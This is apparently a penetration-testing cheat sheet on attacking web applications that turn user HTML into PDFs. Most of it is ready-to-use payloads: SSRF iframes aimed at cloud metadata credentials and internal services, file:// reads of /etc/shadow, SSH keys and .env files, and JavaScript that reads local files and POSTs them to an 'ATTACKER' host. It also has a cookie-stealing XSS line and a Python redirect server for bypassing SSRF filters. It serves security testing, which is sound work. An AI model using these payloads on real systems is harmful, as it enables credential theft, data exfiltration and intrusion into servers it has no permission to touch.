PDF Generation Vulnerabilities
PDF generation attack surface: SSRF via wkhtmltopdf/DomPDF, LFI via headless browser file:// access, XSS-to-PDF code execution, metadata-based library fingerprinting, and blind detection via Burp Collaborator.
What is the Attack Surface
Web applications that generate PDFs from user-controlled HTML (invoices, reports, certificates) use server-side rendering engines — often a headless browser or HTML-to-PDF library. These engines process HTML including JavaScript, external resources, and local file paths, making them powerful SSRF/LFI vectors.
Common libraries:
| Library | Language | Notes |
|---|---|---|
| wkhtmltopdf | C++ (Qt/WebKit) | Runs JavaScript; most common SSRF target |
| DomPDF | PHP | Limited JS; supports CSS/HTML |
| mPDF | PHP | No JS; text-based |
| html2pdf | PHP/JS | Varies |
| PDFKit | Node.js | Wraps wkhtmltopdf |
| PD4ML | Java | Enterprise use |
| WeasyPrint | Python | CSS-focused |
Detection
Step 1 — Identify PDF generation
Look for features that produce downloadable PDFs from user input:
- Invoice generators
- Report/export buttons
- Certificate generators
- Resume builders
- Any form where your input appears in a PDF output
Step 2 — Fingerprint the library
Download a generated PDF and inspect its metadata:
exiftool invoice.pdf
pdfinfo invoice.pdf
strings invoice.pdf | grep -i "creator\|producer\|wkhtmltopdf\|dompdf"
Look for:
Creator: wkhtmltopdf 0.12.6.1
Producer: Qt 4.8.7
Creator: DomPDF 1.2.0
Producer: dompdf + CPDF
The library name and version tells you which exploits apply.
Step 3 — Test for SSRF with Burp Collaborator
Inject an external resource reference into any field that appears in the PDF:
<img src="http://COLLABORATOR_DOMAIN/ssrf_test"/>
<link rel="stylesheet" href="http://COLLABORATOR_DOMAIN/css_test">
<iframe src="http://COLLABORATOR_DOMAIN/iframe_test"></iframe>
If Burp Collaborator receives an HTTP/DNS ping → the PDF engine is fetching external resources → SSRF confirmed.
Exploit 1: SSRF via Resource Tags (wkhtmltopdf)
wkhtmltopdf uses WebKit which fetches all linked resources during rendering.
Image tag SSRF
<img src="http://169.254.169.254/latest/meta-data/iam/security-credentials/">
The rendered PDF will contain the AWS IAM credentials as image load error text (or the raw JSON in some configurations).
iframe SSRF (reads the response body into the PDF)
<iframe src="http://169.254.169.254/latest/meta-data/iam/security-credentials/"
width="800" height="400"></iframe>
The iframe content renders inline in the PDF — cloud metadata appears directly in the document.
Internal service access
<iframe src="http://127.0.0.1:8080/admin"></iframe>
<iframe src="http://internal.company.local/api/users"></iframe>
<iframe src="http://10.0.0.1/router/admin"></iframe>
Exploit 2: LFI via file:// Protocol
wkhtmltopdf and some other engines support file:// URLs to read local files:
iframe file read
<iframe src="file:///etc/passwd" width="800" height="600"></iframe>
<iframe src="file:///etc/shadow"></iframe>
<iframe src="file:///root/.ssh/id_rsa"></iframe>
<iframe src="file:///var/www/html/.env"></iframe>
<iframe src="file:///proc/self/environ"></iframe>
object/embed tag
<object data="file:///etc/passwd"></object>
<embed src="file:///etc/passwd">
img src for binary detection
<img src="file:///etc/passwd">
Won’t render but a broken image placeholder appears — confirms file access.
Exploit 3: JavaScript-Based LFI (wkhtmltopdf / headless Chrome)
For engines that execute JavaScript:
<script>
var xhr = new XMLHttpRequest();
xhr.onload = function() {
document.write('<pre>' + this.responseText + '</pre>');
};
xhr.open('GET', 'file:///etc/passwd', false);
xhr.send();
</script>
Or exfiltrate via an HTTP request (SSRF + LFI combined):
<script>
var xhr = new XMLHttpRequest();
xhr.open('GET', 'file:///etc/passwd', false);
xhr.send();
var contents = xhr.responseText;
var exfil = new XMLHttpRequest();
exfil.open('POST', 'http://ATTACKER/collect', false);
exfil.send(btoa(contents));
</script>
Exploit 4: XSS Payload in PDF Context
If the PDF engine runs JavaScript and the output is rendered in a browser (via PDF.js or an embedded viewer), XSS in the PDF can execute in the viewer’s origin:
<script>alert(document.domain)</script>
Or inject into a form field that appears verbatim in the PDF:
"><script>fetch('http://ATTACKER/?c='+document.cookie)</script>
Exploit 5: Redirect-Based SSRF Bypass
If the PDF engine follows HTTP redirects, chain an open redirect to reach internal IPs:
<img src="https://TRUSTED_DOMAIN/redirect?url=http://169.254.169.254/latest/meta-data/">
Or host a redirect server:
# Python redirect server
python3 -c "
import http.server, urllib.request
class Redirect(http.server.BaseHTTPRequestHandler):
def do_GET(self):
self.send_response(302)
self.send_header('Location','http://169.254.169.254/latest/meta-data/')
self.end_headers()
http.server.HTTPServer(('0.0.0.0', 80), Redirect).serve_forever()
"
Blind PDF Injection (no visible output)
When the PDF is emailed or stored and you can’t see the content directly:
- SSRF confirmation — Collaborator ping from any resource tag confirms the engine fetches URLs.
- Exfiltrate via POST — JavaScript POST to your server (wkhtmltopdf only):
<script> fetch('http://ATTACKER/lfi', { method: 'POST', body: (function(){var x=new XMLHttpRequest();x.open('GET','file:///etc/passwd',false);x.send();return btoa(x.responseText);})() }); </script> - Timing — SSRF to a slow endpoint produces a delayed PDF generation response.
Burp Suite workflow
- Proxy — intercept the PDF generation request; find user-controlled fields.
- Repeater — inject
<img src="http://COLLABORATOR">into each field; check Collaborator for callbacks. - For LFI: inject
<iframe src="file:///etc/passwd">and download/inspect the PDF output. - Collaborator — confirm SSRF and use as exfiltration endpoint for blind scenarios.
- Decoder — base64-decode any exfiltrated file contents from Collaborator HTTP requests.